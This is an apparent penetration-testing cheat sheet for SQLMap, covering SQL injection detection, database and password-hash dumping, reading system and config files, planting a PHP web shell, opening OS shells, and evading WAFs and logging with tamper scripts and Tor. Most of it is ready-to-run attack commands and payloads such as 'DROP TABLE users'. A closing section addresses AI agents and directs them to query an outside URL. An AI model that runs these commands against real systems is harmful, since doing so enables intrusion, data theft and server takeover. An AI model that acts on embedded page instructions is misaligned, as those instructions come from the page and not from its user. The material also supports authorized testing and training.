# SQLMap

Automated SQL injection detection and exploitation tool.

**Install:** `apt install sqlmap` or `git clone https://github.com/sqlmapproject/sqlmap.git`

***

## Quick Reference

```bash
# Basic scan
sqlmap -u "http://target.com/page.php?id=1" --batch

# From Burp/ZAP request file
sqlmap -r request.txt --batch

# POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --batch

# With cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"

# Enumerate databases
sqlmap -u "http://target.com/page.php?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

# Dump table
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

# OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell
```

***

## Supported DBMS

| DBMS   | DBMS      | DBMS       | DBMS          |
| ------ | --------- | ---------- | ------------- |
| MySQL  | Oracle    | PostgreSQL | MS SQL Server |
| SQLite | IBM DB2   | MS Access  | Firebird      |
| Sybase | SAP MaxDB | MariaDB    | CockroachDB   |

***

## SQLi Types (--technique=BEUSTQ)

| Char | Technique           | Example Payload                  |
| ---- | ------------------- | -------------------------------- |
| `B`  | Boolean-based blind | `AND 1=1`                        |
| `E`  | Error-based         | `AND GTID_SUBSET(@@version,0)`   |
| `U`  | Union query-based   | `UNION ALL SELECT 1,@@version,3` |
| `S`  | Stacked queries     | `; DROP TABLE users`             |
| `T`  | Time-based blind    | `AND 1=IF(2>1,SLEEP(5),0)`       |
| `Q`  | Inline queries      | `SELECT (SELECT @@version) FROM` |

***

## Common Flags

### Essential

```bash
--batch              # Non-interactive (auto-accept defaults)
-u URL               # Target URL with parameter
-r FILE              # Read request from file
--data="param=val"   # POST data
-p PARAM             # Specific parameter to test
```

### Enumeration

```bash
--dbs                # Enumerate databases
--tables             # Enumerate tables
--columns            # Enumerate columns
--dump               # Dump table data
--dump-all           # Dump all databases
-D DB                # Specify database
-T TABLE             # Specify table
-C COL1,COL2         # Specify columns
```

### Info Gathering

```bash
--banner             # DBMS banner
--current-user       # Current user
--current-db         # Current database
--hostname           # Server hostname
--is-dba             # Check if DBA privileges
--users              # Enumerate users
--passwords          # Enumerate password hashes
```

### Tuning

```bash
--level=1-5          # Test thoroughness (default 1)
--risk=1-3           # Risk of tests (default 1)
--technique=BEUSTQ   # SQLi techniques to use
--threads=10         # Number of threads
```

### OPSEC

```bash
--random-agent       # Random User-Agent
--mobile             # Mobile User-Agent
--user-agent="..."   # Custom User-Agent
--tor                # Use Tor
--check-tor          # Verify Tor is working
--proxy="http://127.0.0.1:8080"
```

***

## Request Options

### Cookies & Headers

```bash
--cookie="PHPSESSID=abc123; security=low"
-H "X-Forwarded-For: 127.0.0.1"
-H "Authorization: Bearer token123"
```

### HTTP Method

```bash
--method=PUT
--method=DELETE
```

### Mark Injection Point

Use `*` to mark specific parameter(s) to test. You can mark more than one (e.g. cookie and POST body); sqlmap will test each.

```bash
sqlmap -u "http://target.com/api" --data="id=1*&name=test"
sqlmap -u "http://target.com/page?id=1*"
# From request file: add * in the value you want to test (e.g. username=jack&country=Sweden* and cookie user=HASH*)
sqlmap -r index.req --batch
# With time-based blind, parameter #2 (e.g. country) may be the only injectable one; --os-shell/--sql-shell may fail but --file-write can still work
```

### From Burp Request File

```bash
# Save request to file from Burp (Right-click > Copy to file)
sqlmap -r request.txt --batch

# Specify DBMS when known (faster, fewer false positives)
sqlmap -r login.req --batch --dbms mysql
```

Example request file:

```http
GET /page.php?id=1 HTTP/1.1
Host: target.com
Cookie: PHPSESSID=abc123
User-Agent: Mozilla/5.0
```

***

## Database Enumeration

### Step-by-Step

```bash
# 1. Find databases
sqlmap -u "URL" --dbs

# 2. Find tables in database
sqlmap -u "URL" -D dbname --tables

# 3. Find columns in table
sqlmap -u "URL" -D dbname -T tablename --columns

# 4. Dump specific columns
sqlmap -u "URL" -D dbname -T tablename -C username,password --dump

# 5. Dump with conditions
sqlmap -u "URL" -D dbname -T tablename --where="id>10" --dump

# 6. Dump rows range
sqlmap -u "URL" -D dbname -T tablename --start=1 --stop=10 --dump
```

### Search for Data

```bash
# Search for tables containing "user"
sqlmap -u "URL" --search -T user

# Search for columns containing "pass"
sqlmap -u "URL" --search -C pass
```

### Schema

```bash
# Get full database schema
sqlmap -u "URL" --schema
```

***

## File Operations

### Read Files

```bash
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="/var/www/html/config.php"

# File saved to: ~/.sqlmap/output/target.com/files/
```

### Write Files

```bash
# Create shell locally first
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Write to target
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# Verify
curl "http://target.com/shell.php?cmd=id"
```

**More stable PHP webshell (Kali):** Use **wright.php** instead of a one-liner when you have file-write (e.g. SQLi + DBA). It often behaves better than a simple `?cmd=` shell (cleaner output, fewer "Cannot execute blank command" issues):

```bash
# Location on Kali: /usr/share/webshells/php/wright.php
sqlmap -r request.req --file-write="/usr/share/webshells/php/wright.php" --file-dest="/var/www/html/sb.php" --batch
# Then visit http://TARGET/sb.php (or whatever path you used)
```

Works with time-based blind SQLi; file-write can still succeed when `--os-shell` / `--sql-shell` do not.

***

## OS Command Execution

### Interactive Shell

```bash
sqlmap -u "URL" --os-shell

# If UNION fails, try error-based
sqlmap -u "URL" --os-shell --technique=E
```

### SQL Shell

```bash
sqlmap -u "URL" --sql-shell
```

***

## WAF Bypass

### Anti-CSRF Token

```bash
sqlmap -u "URL" --csrf-token="csrf-token"
```

### Randomize Parameter

```bash
sqlmap -u "http://target.com/?id=1&rp=12345" --randomize=rp
```

### Calculated Parameter (e.g., hash)

```bash
sqlmap -u "http://target.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" \
       --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()"
```

### Tamper Scripts

```bash
# Single tamper
sqlmap -u "URL" --tamper=space2comment

# Chained tampers
sqlmap -u "URL" --tamper=between,randomcase,space2comment

# List all tamper scripts
sqlmap --list-tampers
```

#### Common Tamper Scripts

| Script                 | Description                          |
| ---------------------- | ------------------------------------ |
| `space2comment`        | Replace spaces with /\*\*/           |
| `between`              | Replace `>` with `NOT BETWEEN 0 AND` |
| `randomcase`           | Random case keywords                 |
| `equaltolike`          | Replace `=` with `LIKE`              |
| `base64encode`         | Base64 encode payload                |
| `charencode`           | URL encode characters                |
| `space2plus`           | Replace spaces with +                |
| `space2hash`           | Replace spaces with # (MySQL)        |
| `percentage`           | Add % before each character          |
| `modsecurityversioned` | MySQL versioned comments             |

### Other Bypass Options

```bash
--random-agent        # Bypass user-agent blacklist
--chunked             # Chunked transfer encoding
--hpp                 # HTTP Parameter Pollution
--skip-waf            # Skip WAF detection
```

***

## Troubleshooting

### All parameters not injectable

When sqlmap reports "all tested parameters do not appear to be injectable", try increasing thoroughness and WAF bypass:

```bash
# Higher level/risk (more payloads; risk 3 can modify data)
sqlmap -r request.req --batch --level=3 --risk=2

# With tamper (e.g. space2comment for WAF)
sqlmap -r request.req --batch --tamper=space2comment
```

### Parse Errors

```bash
sqlmap -u "URL" --parse-errors
```

### Save Traffic

```bash
sqlmap -u "URL" -t /tmp/traffic.txt
```

### Verbose Output

```bash
sqlmap -u "URL" -v 3      # Show payloads
sqlmap -u "URL" -v 6      # Full HTTP traffic
```

### Through Proxy

```bash
sqlmap -u "URL" --proxy="http://127.0.0.1:8080"
```

### Specify Prefix/Suffix

```bash
sqlmap -u "URL" --prefix="%'))" --suffix="-- -"
```

***

## Level & Risk Settings

| Level | Tests                          |
| ----- | ------------------------------ |
| 1     | Default - basic tests          |
| 2     | Add Cookie testing             |
| 3     | Add User-Agent/Referer testing |
| 4     | More payloads                  |
| 5     | Maximum - all boundaries       |

| Risk | Tests                           |
| ---- | ------------------------------- |
| 1    | Default - safe tests            |
| 2    | Add heavy time-based            |
| 3    | Add OR-based (can modify data!) |

```bash
# Maximum testing (slow, noisy)
sqlmap -u "URL" --level=5 --risk=3
```

***

## SQLMap Over WebSockets

SQLMap doesn't natively support WebSockets. Use a Flask proxy to translate HTTP requests to WebSocket messages.

### Flask Proxy Script

```python
# ws_proxy.py
from flask import Flask, request
from websocket import create_connection

app = Flask(__name__)

ws_url = "ws://target.com:9091"  # WebSocket endpoint

@app.route("/")
def handle():
    query = request.args.get('query')
    
    ws = create_connection(ws_url)
    
    # Modify payload format as needed for target
    payload = '{"id":"%s"}' % query
    
    ws.send(payload)
    res = ws.recv()
    ws.close()
    
    return res if res else "no response"

if __name__ == "__main__":
    app.run(debug=False)
```

### Setup & Run

```bash
# Setup
python3 -m venv .venv
source .venv/bin/activate
pip install flask websocket-client

# Run proxy
flask run
# or: python ws_proxy.py

# Now use sqlmap against local proxy
sqlmap -u "http://localhost:5000/?query=1" --batch --dbs
```

### Common WebSocket Payload Formats

```python
# JSON with id parameter
payload = '{"id":"%s"}' % query

# JSON with ticket/search
payload = '{"ticket":"%s"}' % query

# Plain text
payload = query
```

**Reference:** <https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html>

***

## Useful One-Liners

```bash
# Quick DB dump
sqlmap -u "URL" --dump --batch

# Get shell fast
sqlmap -u "URL" --os-shell --batch --technique=E

# Dump passwords and crack
sqlmap -u "URL" --passwords --batch

# Full auto-pwn
sqlmap -u "URL" --all --batch

# Crawl and test forms
sqlmap -u "http://target.com/" --forms --crawl=2 --batch
```

***

## Output Files

Results saved to: `~/.sqlmap/output/<target>/`

```
~/.sqlmap/output/target.com/
├── dump/           # Dumped tables (CSV)
├── files/          # Downloaded files
├── log             # Session log
└── session.sqlite  # Session data (resume scans)
```

***

## Session Management

```bash
# Resume previous session
sqlmap -u "URL"  # Auto-resumes if session exists

# Fresh scan (ignore session)
sqlmap -u "URL" --flush-session

# Specify output directory
sqlmap -u "URL" --output-dir=/tmp/sqlmap_out
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/tool-guides/sqlmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.